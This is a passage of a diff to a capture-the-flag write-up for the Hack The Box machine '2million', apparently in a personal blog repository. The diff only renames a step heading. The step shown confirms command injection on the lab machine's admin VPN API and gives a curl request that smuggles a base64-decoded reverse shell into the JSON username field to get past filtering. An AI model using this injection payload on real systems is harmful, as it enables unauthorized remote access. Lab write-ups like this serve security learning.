zaihanoi/zaihanoi.github.io/wu/2million/2million.md

 The backend server response the output of `whoami` command is `www-data` which verifies that our `command injection` attack succesful.

-13. From the hint in previous step, I tried to inject `reverse shell` in the command but it return nothing.
+### Step 13.
+From the hint in previous step, I tried to inject `reverse shell` in the command but it return nothing.
 Maybe I should encode our reverse shell to bypass the security system of backend server.
 I tried to encode my reverse shell to `base64`:

 ```bash
 curl http://2million.htb/api/v1/admin/vpn/generate -H 'Cookie: PHPSESSID=<MY_COOKIE>' -X POST -d '{"username": "admin;echo '<BASE64_REVERSE_SHELL>'| base64 -d| bash;"}' -H 'Content-Type: application/json'